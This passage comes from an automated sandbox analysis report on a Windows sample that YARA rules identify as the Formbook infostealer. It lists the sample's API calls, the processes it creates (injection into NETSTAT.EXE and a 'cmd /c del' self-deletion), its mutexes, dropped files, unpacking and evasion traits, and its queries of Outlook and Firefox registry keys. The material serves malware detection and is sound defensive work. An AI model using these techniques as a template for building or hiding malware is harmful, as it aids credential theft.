          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A66B4 NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_034A66B4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BBD40 NtSuspendThread,5_2_034BBD40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B2D5C NtProtectVirtualMemory,5_2_034B2D5C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F6D65 NtQuerySystemInformation,5_2_034F6D65
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348CD70 NtQueryVirtualMemory,5_2_0348CD70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501516 NtFreeVirtualMemory,5_2_03501516
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AFD13 NtUnmapViewOfSection,5_2_034AFD13
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AE52F NtClose,NtClose,5_2_034AE52F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA520 NtEnumerateKey,5_2_034BA520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FF5C8 NtProtectVirtualMemory,5_2_034FF5C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ABDF2 NtProtectVirtualMemory,5_2_034ABDF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035265EA NtQueryVirtualMemory,5_2_035265EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA5F0 NtReadVirtualMemory,5_2_034BA5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03545595 NtQueryInformationToken,5_2_03545595
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0349F591 NtClose,5_2_0349F591
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA5A0 NtWriteVirtualMemory,5_2_034BA5A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F65A3 NtClose,5_2_034F65A3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03472DAA NtWaitForSingleObject,5_2_03472DAA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B8442 NtAllocateVirtualMemory,5_2_034B8442
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A245F NtAllocateVirtualMemory,NtQueryVirtualMemory,5_2_034A245F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347AC6E NtQueryInformationProcess,5_2_0347AC6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA460 NtOpenProcess,5_2_034BA460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03497C7D NtClose,5_2_03497C7D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A547E NtAllocateVirtualMemory,NtQueryVirtualMemory,5_2_034A547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB470 NtOpenThread,5_2_034BB470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501408 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_03501408
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353EC09 NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_0353EC09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB410 NtOpenProcessToken,5_2_034BB410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A242B NtQueryVirtualMemory,5_2_034A242B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0349F42B NtCreateSection,NtClose,NtClose,5_2_0349F42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348A423 NtProtectVirtualMemory,5_2_0348A423
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA430 NtQueryVirtualMemory,5_2_034BA430
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035034C9 NtClose,NtQueryValueKey,NtQueryValueKey,NtEnumerateValueKey,5_2_035034C9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03500C82 NtUnmapViewOfSection,NtClose,NtClose,NtClose,NtClose,NtClose,5_2_03500C82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA4A0 NtUnmapViewOfSection,5_2_034BA4A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6BC0 NtCreateFile,5_2_032B6BC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6DA0 NtAllocateVirtualMemory,5_2_032B6DA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6C70 NtReadFile,5_2_032B6C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6CF0 NtClose,5_2_032B6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6BBA NtCreateFile,5_2_032B6BBA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6C12 NtReadFile,5_2_032B6C12
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C800F80_2_00C800F8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C81C7C0_2_00C81C7C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C87DC00_2_00C87DC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C801D60_2_00C801D6
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C82AD80_2_00C82AD8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C89A000_2_00C89A00
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C892180_2_00C89218
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C80BE00_2_00C80BE0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C813A00_2_00C813A0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C844930_2_00C84493
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8D0780_2_00C8D078
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8940C0_2_00C8940C
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C8801C
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C89410
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C8C810
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C88020
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C83838
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C83830
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C85834
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C885CC
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C885D0
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C84998
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C84995
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C801BD
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C84D58
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C82AD1
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C8F240
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C89211
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C8022E
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C88BC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C80BD8
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C847B8
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C84BB8
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C847B3
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C84BB3
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C88B6C
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_0041B0DB
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_004078EB
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_004078F0
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_0041AB5A
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00419D31
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_0041A742
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0349FB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A63C2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0347EBE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A4B96
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A4A5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0354E214
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03530A02
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035422DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03541A99
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034942B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A594B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A7110
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035419E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A6180
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0354D9BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A1070
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0353D016
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034AE020
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A0021
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A48CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035428E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0348A080
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035218B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03541746
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03541FCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03532782
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03495790
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03497640
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A4E61
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0353CE66
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A5E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A6611
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035426F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03533E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03470D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03531D1B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03542519
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0351C53F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03491530
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0353D5D2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0352FDDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03521DE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0353E581
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034A547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0348740C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03491410
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0352F42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_035344EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03533490
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03541C9F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032BAB5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032A78EB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032A78F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032BB0DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0347B0E0 appears 168 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 034CDDE8 appears 34 times
          Source: druS9vVaUK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: axh0nv7nt03do.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: druS9vVaUK.exe | Binary or memory string: OriginalFilename vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.443094538.0000000000518000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.446398805.0000000002B00000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRuntimeCore.dll8 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.500225053.00000000004F8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.503364248.000000000119F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs druS9vVaUK.exe
          Source: druS9vVaUK.exe | Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: druS9vVaUK.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: axh0nv7nt03do.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00BCA70E AdjustTokenPrivileges
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00BCA6D7 AdjustTokenPrivileges
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\druS9vVaUK.exe.log
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Mutant created: \Sessions\1\BaseNamedObjects\VdLINVBOKOiFSfVNXuAoBmCBmda
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_01
          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Ttrexqpt
          Source: druS9vVaUK.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: druS9vVaUK.exe | Virustotal: Detection: 33%
          Source: druS9vVaUK.exe | ReversingLabs: Detection: 35%
          Source: unknown | Process created: C:\Users\user\Desktop\druS9vVaUK.exe 'C:\Users\user\Desktop\druS9vVaUK.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe'
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | File written: C:\Users\user\AppData\Roaming\940NNO9F\940logri.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: druS9vVaUK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: druS9vVaUK.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
          Source: Binary string: netstat.pdb source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.853545081.000000000356F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: mscorrc.pdb source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_004DD405 push es; retf 0_2_004DD41F
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00BC2EED push esi; retf 0_2_00BC2EFA
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C60A35 push cs; iretd 0_2_00C60A3E
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C879E9 push esp; retf 0_2_00C87A02
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C887D9 push edi; iretd 0_2_00C887DA
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 0_2_00C873B4 push dword ptr [ecx+35B307F2h]; ret 0_2_00C873C9
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00414058 pushad ; retf 2_2_00414059
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00419A35 push eax; ret 2_2_00419A88
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00419AEC push eax; ret 2_2_00419AF2
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00419A82 push eax; ret 2_2_00419A88
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_00419A8B push eax; ret 2_2_00419AF2
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_0041AEEA push eax; ret 2_2_0041AEF1
          Source: C:\Users\user\Desktop\druS9vVaUK.exe | Code function: 2_2_004BD405 push es; retf 2_2_004BD41F
